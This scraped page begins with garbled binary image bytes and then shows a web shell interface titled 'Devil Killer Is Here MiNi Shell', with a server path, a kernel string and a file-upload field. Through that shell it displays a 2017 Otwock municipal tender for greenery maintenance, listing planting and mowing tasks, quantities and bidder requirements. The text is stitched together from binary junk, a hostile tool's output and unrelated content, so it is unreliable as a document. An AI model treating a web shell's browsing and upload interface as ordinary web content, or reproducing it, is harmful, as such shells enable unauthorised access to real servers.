JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20170406/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20170406/60310-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.otwock.pl' target='_blank'>http://www.bip.otwock.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 60310 - 2017
              z dnia 2017-04-06 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Otwock: Utrzymanie i pielęgnacja zieleni na terenie miasta Otwocka w 2017 roku.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Otwock, krajowy numer identyfikacyjny
              1326877000000, ul.
              ul. Armii Krajowej 
              5,
              05400  
              Otwock, woj.
              mazowieckie, państwo
              Polska, tel.
              227 792 001, e-mail
              umotwock@otwock.pl, faks
              227 794 225.
              <br />
              Adres strony internetowej (URL): www.bip.otwock.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.bip.otwock.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.otwock.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />za pośrednictwem operatora pocztowego osobiście lub za pośrednictwem posłańca. <br />
                Adres:
                <br />ul. Armii Krajowej 5, Otwock kod 05-400, budynek B, pok. nr 1.</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Utrzymanie i pielęgnacja zieleni na terenie miasta Otwocka w 2017 roku.<br /><b>Numer referencyjny: </b>WZP.271.26.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>III.  	Opis przedmiotu zamówienia.
1.	Zakres i opis przedmiotu zamówienia:
1.1. Przedmiotem zamówienia jest wykonywanie na terenie  miasta Otwocka - w pasach  dróg  gminnych,          w parku miejskim, na skwerach oraz na innych terenach  należących do Gminy Otwock  lub będących  w  jej  władaniu - prac  w zakresie pielęgnacji i sadzenia  roślin, utrzymania i pielęgnacji terenów zieleni.  
        1.2.  Zakres  przedmiotu  zamówienia  obejmuje:
1)	Sadzenie  sadzenie kwiatów jednorocznych i dwuletnich  na rabatach i w wazach  - materiał roślinny 
jakości I, gatunki takie jak m.in.: aksamitka, begonia stale kwitnąca, szałwia, żeniszek, dalia, pelargonia, mrozy, bratek - z przygotowaniem  podłoża, uzupełnieniem  ziemi  urodzajnej, podlaniem i wywozem  odpadów,  
2)	obsadzenie kwiatami doniczek wiszących na latarniach i wież stojących -  dobór materiału roślinnego jakości I, gatunki takie jak m.in. pelargonia, surfinia i petunia, o pokroju zwisającym, dającego natychmiastowy efekt wizualny, bez konieczności oczekiwania na rozwój kwiatów  (kolorystyka kwiatów do uzgodnienia z Zamawiającym) - przygotowanie podłoża z ziemi ogrodniczej przeznaczonej do nasadzeń kwiatów, wywóz odpadów, 
3)	sadzenie bylin - materiał roślinny jakości I, gatunki takie jak m.in.: liliowiec pośredni, szałwia omszona, żurawka  amerykańska - z bryłą korzeniową w pojemniku P9,  z przygotowaniem podłoża, zaprawą  dołków ziemią  urodzajną, podlaniem  i wywozem  odpadów,
4)	sadzenie traw ozdobnych - materiał roślinny jakości I, gatunki m.in.: trzęślica modra, trzciniczek ostrokwiatowy - z bryłą  korzeniową w pojemniku C1, z przygotowaniem podłoża, zaprawą dołków ziemią  urodzajną,  podlaniem i wywozem odpadów,
5)	pielęgnację  kwiatów jednorocznych i dwuletnich  na  rabatach i w wazach,  tj. odchwaszczanie, spulchnianie  ziemi, przycinanie, usuwanie przekwitniętych  kwiatostanów, nawożenie, ochrona przed chorobami i szkodnikami, usunięcie roślin po sezonie i przekopanie ziemi, wywóz odpadów, 
6)	pielęgnację kwiatów w doniczkach wiszących i wież kwiatowych, tj. podlewanie, zastosowanie odpowiednich substancji odżywczych, ochrona przed chorobami i szkodnikami, przycinanie, usuwanie przekwitniętych kwiatostanów, usunięcie roślin po sezonie, wywóz odpadów,
7)	pielęgnację krzewów i traw ozdobnych,  tj. przycinanie,  usuwanie chwastów,  nawożenie, wywóz odpadów,
8)	podlewanie kwiatów jednorocznych i dwuletnich na rabatach i w wazach,
9)	podlewanie krzewów i traw ozdobnych, 
10)	posadzenie cebulek kwiatów wieloletnich m.in. krokusy, rannik zimowy, przebiśniegi;
11)	posadzenie cebulek  tulipanów,  tj. usunięcie  roślin po sezonie letnim, przygotowanie podłoża, uzupełnienie ziemi urodzajnej, wywóz odpadów,
12)	sadzenie krzewów liściastych - materiał roślinny jakości I, gatunki  takie jak m.in.:  berberys, tawuła japońska, forsycja, pęcherznica -  z bryłą korzeniową w pojemniku C3, z wykopaniem dołków, zaprawą  dołków ziemią urodzajną, podlaniem,  uporządkowaniem terenu, wywozem odpadów, 
13)	sadzenie krzewów  iglastych - materiał roślinny jakości I, gatunki takie jak m.in.: jałowiec płożący, 
jałowiec pośredni -  z bryłą korzeniową w pojemniku C3,  z wykopaniem dołków, zaprawą dołków ziemią urodzajną, podlaniem, uporządkowaniem terenu, wywozem odpadów, 
14)	rozplantowanie kory pod  nasadzenia o grubości  około 3 cm, 
15)	sadzenie żywopłotów - materiał roślinny  jakości I, gatunki m.in.: ligustr, forsycja -  z wykopaniem  rowów,  zaprawą  rowów ziemią  urodzajną,  podlaniem,  uporządkowaniem terenu i wywozem odpadów,
16)	przycinanie żywopłotów  z  trzech  stron i wywóz  odpadów, 
17)	odchwaszczanie żywopłotów  i  wywóz  odpadów,            
18)	zakładanie  trawników z wymianą  ziemi na ziemię urodzajną do głębokości 10 cm, zabiegi agrotechniczne zgodnie z normą i sztuką ogrodniczą, wysianie mieszanki traw, uwałowanie, przykrycie nasion warstwą ziemi urodzajnej, podlanie, zabezpieczenie przez zadeptaniem, wywóz odpadów,
19)	uzupełnienie zniszczonych trawników z przekopaniem ziemi, dosianiem trawy, uwałowaniem, podlaniem, zabezpieczeniem przed zadeptaniem i wywozem  odpadów,
20)	koszenie  trawników,  wygrabienie skoszonej  trawy  i  wywóz  odpadów,
21)	koszenie  poboczy  ulic,  wygrabienie skoszonych chwastów, trawy i wywóz odpadów,
22)	koszenie rowów  odwadniających, wygrabienie skoszonych chwastów, trawy i wywóz odpadów,
23)	skoszenie zrekultywowanego składowiska odpadów, bez zbierania i wywozu odpadów,
24)	grabienie liści na terenach  zieleni i wywóz odpadów,        
25)	wywóz  odpadów  zielonych do regionalnej instalacji do przetwarzania odpadów komunalnych  -  dotyczy odpadów zgromadzonych przez  mieszkańców  na  terenach  należących do Gminy Otwock  lub będących w jej władaniu.
1.3. Wszystkie prace objęte zamówieniem obejmują także zakup materiałów niezbędnych do ich wykonania, takich jak m.in.: rośliny, cebulki, nasiona traw, ziemia urodzajna, kora, nawozy, środki ochrony roślin,  a także zapewnienie wody do podlewania. 
1.4. Wyżej wymienione prace będą  realizowane w oparciu o zlecenia jednostkowe zawierające zakres                   i  termin  wykonania,  przekazywane  przez  Zamawiającego  w  formie  pisemnej - przystąpienie do realizacji  tych  prac  przez  Wykonawcę  nastąpi  w  terminie:
1)  dnia  (dot. pkt 1.2. ppkt 8, 9 i 25)       
oraz             
2)  dni (dot. pkt 1.2. ppkt 1-7 oraz 10 - 24) 
od dnia otrzymania zlecenia jednostkowego.
         1.5.  W przypadku wypadów kwiatów na rabatach,  w wazach  i w doniczkach  Wykonawca zobowiązany jest   uzupełniać rośliny na bieżąco i na własny koszt.
1.6.	   Wywóz odpadów po koszeniu powinien odbywać się najpóźniej następnego dnia po zakończeniu każdego etapu koszenia.
1.7.	   Wywóz  liści po grabieniu powinien odbywać się najpóźniej następnego dnia po zakończeniu
         każdego etapu grabienia.
1.8.	Wywóz odpadów powstałych podczas realizacji pozostałych prac wymienionych w punkcie 1.2.1-18
         powinien odbywać się natychmiast po ich zakończeniu.
1.9.	Współpraca z Zamawiającym podczas realizacji przedmiotu umowy, w tym zorganizowanie środków transportu  w  celu  wspólnej  kontroli  i  odbioru  wykonanych  prac.
       1.10.   Rozliczenie wykonanych  prac  następować  będzie  w  oparciu  o  zaoferowane  przez  Wykonawcę 
        w  ofercie  przetargowej  ceny  brutto:
1)	za posadzenie kwiatów jednorocznych i dwuletnich  na pow. 1m2 ,
2)	za obsadzenie kwiatami 1 doniczki wiszącej,
3)	za obsadzenie kwiatami 1 wieży o wys. 128 cm,
4)	za  obsadzenie kwiatami 1 wieży o wys. 152 cm,
5)	za posadzenie 1 byliny,
6)	za posadzenie 1 trawy ozdobnej,
7)	za pielęgnację kwiatów jednorocznych i dwuletnich  na pow. 1 m2,
8)	za pielęgnację kwiatów w doniczkach wiszących za 1 szt.,
9)	za pielęgnację wież  kwiatowych za 1 szt.,
10)	za pielęgnację krzewów i traw ozdobnych  na pow. 1 m2, 
11)	za podlanie kwiatów  jednorocznych i dwuletnich na  pow. 1 m2,
12)	za podlanie krzewów i traw ozdobnych  na  pow. 1 m2 ,
13)	za posadzenie cebulek kwiatów wieloletnich na pow. 1m2,
14)	za posadzenie cebulek tulipanów  na pow. 1 m2,
15)	za posadzenie 1 krzewu  liściastego,
16)	za posadzenie  1 krzewu  iglastego,
17)	za rozplantowanie kory  na  pow. 1 m2,
18)	za posadzenie 1 mb  żywopłotu,
19)	za przycięcie 1 mb  żywopłotu,
20)	za odchwaszczenie  1 m2  żywopłotu,
21)	za założenie 1m2  trawnika,
22)	za uzupełnienie 1 m2 zniszczonego trawnika,
23)	za skoszenie  1 m2  trawnika,
24)	za  skoszenie  1 m2  pobocza ulicy,
25)	za skoszenie  1 m2 rowu odwadniającego,
26)	za  skoszenie 1 m2 zrekultywowanego składowiska odpadów, 
27)	za  zagrabienie liści z pow. 1 m2  terenu  zieleni,       
28)	za wywóz 1 Mg odpadów zielonych. 
1.11.  Ceny, o których mowa w punkcie 1.9. skalkulowane przez Wykonawcę powinny uwzględniać wszystkie koszty związane z prawidłowym wykonaniem przedmiotu zamówienia który został określony w  punkcie 1.2.,  łącznie z materiałami, wywozem i przekazaniem  odpadów do regionalnej instalacji do  przetwarzania odpadów komunalnych i ich unieszkodliwieniem  oraz należny podatek VAT.
 1.12.  Wykonawca zobowiązany jest do przekazywania Zamawiającemu dokumentów potwierdzających ilość     odpadów przyjętych przez regionalną instalację do przetwarzania odpadów w poszczególnych miesiącach.
 1.13.  Zakres  prac  przewidywany  do  wykonania  w  okresie  obowiązywania  umowy:
1)	sadzenie kwiatów jednorocznych i dwuletnich  na  pow. 500 m2,  średnio 25 szt./m2, tj. 12 500 szt.,
2)	obsadzenie kwiatami doniczek wiszących  ( o promieniu 30 cm) - 100 szt.,
3)	obsadzenie  kwiatami wież  stojących o wys. 128 cm  (4 misy o średnicach  80,65,55 i 40 cm)  - 2 szt.,
4)	obsadzenie kwiatami wież stojących o wys. 152 cm  (5 mis o średnicach  80,65,55,45 i 35 cm)  - 2szt.,
5)	sadzenie bylin -  150 szt.,
6)	sadzenie traw ozdobnych   -  20 szt.,
7)	pielęgnacja kwiatów  jednorocznych i dwuletnich na pow. 500 m2  -  4-krotna,
8)	pielęgnacja kwiatów  w doniczkach  wiszących  100 szt.  -  45-krotna,
9)	pielęgnacja wież kwiatowych  4 szt.  -  45-krotna,
10)	pielęgnacja  krzewów  i  traw  ozdobnych  na  pow.  5 400 m2  - 4-krotna, 
11)	podlewanie  kwiatów  jednorocznych  i  dwuletnich  (około 7 l  wody na 1 m2)  na  pow. 500 m2  -              40- krotne,
12)	podlewanie krzewów  i  traw  ozdobnych   (około 30 l  wody na 1 m 2 ) na  pow. 5 400 m2  -  6-krotne, 
13)	posadzenie  100 000 cebulek kwiatów wieloletnich na pow. 1 000 m2,
14)	posadzenie  4 000 szt. cebulek  tulipanów  na pow. 145 m2,
15)	sadzenie krzewów liściastych  - 150 szt.,
16)	sadzenie krzewów iglastych  - 20 szt.,    
17)	rozplantowanie kory  na  pow. 600 m2,
18)	sadzenie żywopłotów - 400 mb,  6 szt./mb,
19)	przycinanie żywopłotów  - 4 600 mb  -  2-krotne, 
20)	odchwaszczanie żywopłotów -  2 000 m2,                     
21)	zakładanie trawników  o  pow. 1 000 m2,
22)	uzupełnienie  zniszczonych  trawników  o  pow.  300 m2,   
23)	koszenie trawników o pow.  140 000 m2   -  4- krotne,
24)	koszenie poboczy ulic o pow. 90 000 m2   -  5- krotne,
25)	koszenie rowów odwadniających o pow.  44 000 m2   -  3-krotne, 
26)	skoszenie zrekultywowanego  składowiska  o  pow. 50 000 m2  -  1-krotne,
27)	grabienie  liści na terenach  zieleni  o  pow.  130 000 m2  -  2-krotne,
28)	wywóz odpadów zielonych  - 100 Mg.
 1.14.   Zamawiający zastrzega, że podane ilości oraz częstotliwość wykonania prac nie są obligatoryjne i mogą ulec zmianie w toku realizacji umowy w zależności od potrzeb i warunków atmosferycznych.          
 1.15.   Cena  za  wywóz  1 tony  odpadów  zielonych,  o  których  mowa  w  punkcie 1.2.24  skalkulowana przez  Wykonawcę   powinna  uwzględniać  koszty  załadunku,  koszty  transportu  na  terenie miasta, koszty wywozu i przekazania odpadów do regionalnej  instalacji  do  przetwarzania  odpadów komunalnych  i  ich  unieszkodliwienie  oraz  należny  podatek VAT.
 1.16.   Całkowite wynagrodzenie należne Wykonawcy będzie uzależnione od  rzeczywistej  ilości  prac   wykonanych  w okresie obowiązywania umowy.
 1.17.   Wykonawca, jako wytwórca odpadów w rozumieniu art. 3 ust. 1  pkt 32 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz.U. z 2013 r., poz.21 z poźn. zm.) ma obowiązek gospodarowania powstałymi podczas realizacji przedmiotu zamówienia odpadami, zgodnie z ustawą o odpadach.
 1.18.   Wykonawca, przed podpisaniem umowy zobowiązany jest do przedstawienia Zamawiającemu aktualnej umowy  z  regionalną  instalacją  do  przetwarzania  odpadów  komunalnych  na  przyjmowanie  odpadów.
W przypadku braku przedstawienia przez Wykonawcę wymienionego wyżej, kompletnego i poprawnego dokumentu (poświadczonego za zgodność z oryginałem przez Wykonawcę) Zamawiający uzna, że Wykonawca  ze  swojej  winy  uchyla  się  od  zawarcia  umowy.
<br /><br /><b>II.5) Główny kod CPV: </b>77300000-3<br /><b> Dodatkowe kody CPV:</b>77310000-6,
                77342000-9,
                77211400-6,
                77211500-7,
                77211600-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje możliwość dokonania zamówień, o których mowa w art. 67 ust. 1 pkt  7 stanowiących nie więcej nie więcej niż 50 %  wartości zamówienia podstawowego dotychczasowemu wykonawcy usług. Zamówienie udzielone zostanie w trybie zamówienia z wolnej ręki zgodnie z warunkami zamówienia podstawowego na takich samych warunkach jak zamówienie podstawowe w następującym zakresie: sadzenie kwiatów jednorocznych i dwuletnich, obsadzenie kwiatami doniczek wiszących  ( o promieniu 30 cm), obsadzenie  kwiatami wież  stojących o wys. 128 cm, obsadzenie kwiatami wież stojących o wys. 152 cm, sadzenie bylin, sadzenie traw ozdobnych, pielęgnacja kwiatów  jednorocznych i dwuletnich, pielęgnacja kwiatów  w doniczkach  wiszących, pielęgnacja wież kwiatowych, pielęgnacja  krzewów  i  traw  ozdobnych, podlewanie  kwiatów  jednorocznych  i  dwuletnich, podlewanie krzewów  i  traw  ozdobnych, posadzenie  cebulek kwiatów wieloletnich, posadzenie  cebulek  tulipanów, sadzenie krzewów liściastych, sadzenie krzewów iglastych, rozplantowanie kory, sadzenie żywopłotów, przycinanie żywopłotów, odchwaszczanie żywopłotów, zakładanie trawników, uzupełnienie  zniszczonych  trawników, koszenie trawników, koszenie poboczy ulic, koszenie rowów odwadniających, skoszenie zrekultywowanego  składowiska, grabienie  liści na terenach  zieleni, wywóz odpadów zielonych.  <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                	Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wykonał co najmniej jedną usługę polegającą na utrzymaniu i pielęgnacji zieleni (zawierającą co najmniej wykonywanie  takich prac  jak: sadzenie i pielęgnacja krzewów i żywopłotów lub sadzenie i  pielęgnacja kwiatów lub koszenie trawników lub poboczy lub grabienie terenów zieleni itp.) o wartości minimalnej 200 000,00 PLN brutto.

	Warunek zostanie za spełniony jeżeli Wykonawca wykaże, iż dysponuje/będzie dysponował co najmniej 1 osobą, która posiada wykształcenie ogrodnicze wyższe lub średnie w zakresie urządzania  i pielęgnacji  terenów zieleni oraz pięcioletnią praktykę zawodową.  

	Warunek zostanie za spełniony jeżeli Wykonawca wykaże, iż dysponuje/będzie dysponował co najmniej:
-  dwoma piłami spalinowymi,
-  łącznie dwunastoma kosiarkami i kosami spalinowymi,
-  dwoma samochodami ze zdejmowanymi pojemnikami o pojemności nie mniejszej niż 7 m3 każdy.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
